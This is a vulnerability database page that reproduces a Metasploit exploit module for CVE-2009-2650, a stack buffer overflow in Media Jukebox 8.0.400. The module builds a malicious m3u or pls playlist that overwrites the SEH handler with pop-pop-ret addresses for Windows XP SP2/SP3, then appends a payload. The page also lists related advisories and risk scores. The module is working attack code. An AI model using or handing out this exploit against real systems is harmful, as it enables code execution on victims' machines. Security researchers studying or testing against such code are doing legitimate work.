Lucene search
K

Media Jukebox 8.0.400 Buffer Overflow (SEH)

🗓️ 28 Dec 2009 04:36:25Reported by Ron Henry <[email protected]>, dijital1Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 22 Views

Media Jukebox 8.0.400 Buffer Overflow in m3u or pls fil

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2009-2650
16 Jul 200900:00
circl
CVE
CVE-2009-2650
30 Jul 200919:00
cve
Cvelist
CVE-2009-2650
30 Jul 200919:00
cvelist
Exploit DB
Media Jukebox 8.0.400 - Local Buffer Overflow (SEH) (Metasploit)
27 Dec 200900:00
exploitdb
Exploit DB
Media Jukebox 8.0.400 - Buffer Overflow Exploit SEH
8 Jan 201100:00
exploitdb
exploitpack
Media Jukebox 8.0.400 - Local Buffer Overflow (SEH) (Metasploit)
27 Dec 200900:00
exploitpack
NVD
CVE-2009-2650
30 Jul 200919:30
nvd
Packet Storm
Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH)
31 Dec 200900:00
packetstorm
Prion
Heap overflow
30 Jul 200919:30
prion
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Media Jukebox 8.0.400 Buffer Overflow (SEH)',
      'Description' => %q{
          This module exploits a stack buffer overflow in Media Jukebox 8.0.400
        by creating a specially crafted m3u or pls file.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Ron Henry <rlh[at]ciphermonk.net>',
          'dijital1',
        ],
      'References' =>
        [
          [ 'OSVDB', '55924' ],
          [ 'CVE', '2009-2650']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
          'DisablePayloadHandler' => true
        },
      'Payload' =>
        {
          'Space' => 3000,
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x26\x3d\x2b\x3f\x3a\x3b\x2d\x2c\x2f\x23\x2e\x5c\x30",
          'StackAdjustment' => -3500,
        },
      'Platform' => 'win',
      'Targets' =>
        [
          [ 'Windows XP SP3 - English', { 'Ret' => 0x02951457} ], 		# 0x02951457 pop, pop, ret dsp_mjMain.dll
          [ 'Windows XP SP2 - English', { 'Ret' => 0x02291457} ], 		# 0x02291457 pop, pop, ret dsp_mjMain.dll
        ],
      'Privileged' => false,
      'DisclosureDate' => '2009-07-01',
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'metasploit.m3u']),
      ])
  end


  def exploit
    sploit = "\x68\x74\x74\x70\x3a\x2f\x2f" # "http://" trigger
    sploit << rand_text_alphanumeric(262)
    sploit << generate_seh_payload(target.ret)
    sploit << payload.encoded

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(sploit)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2020 20:00Current
7.4High risk
Vulners AI Score7.4
CVSS 29.3
EPSS0.30685
22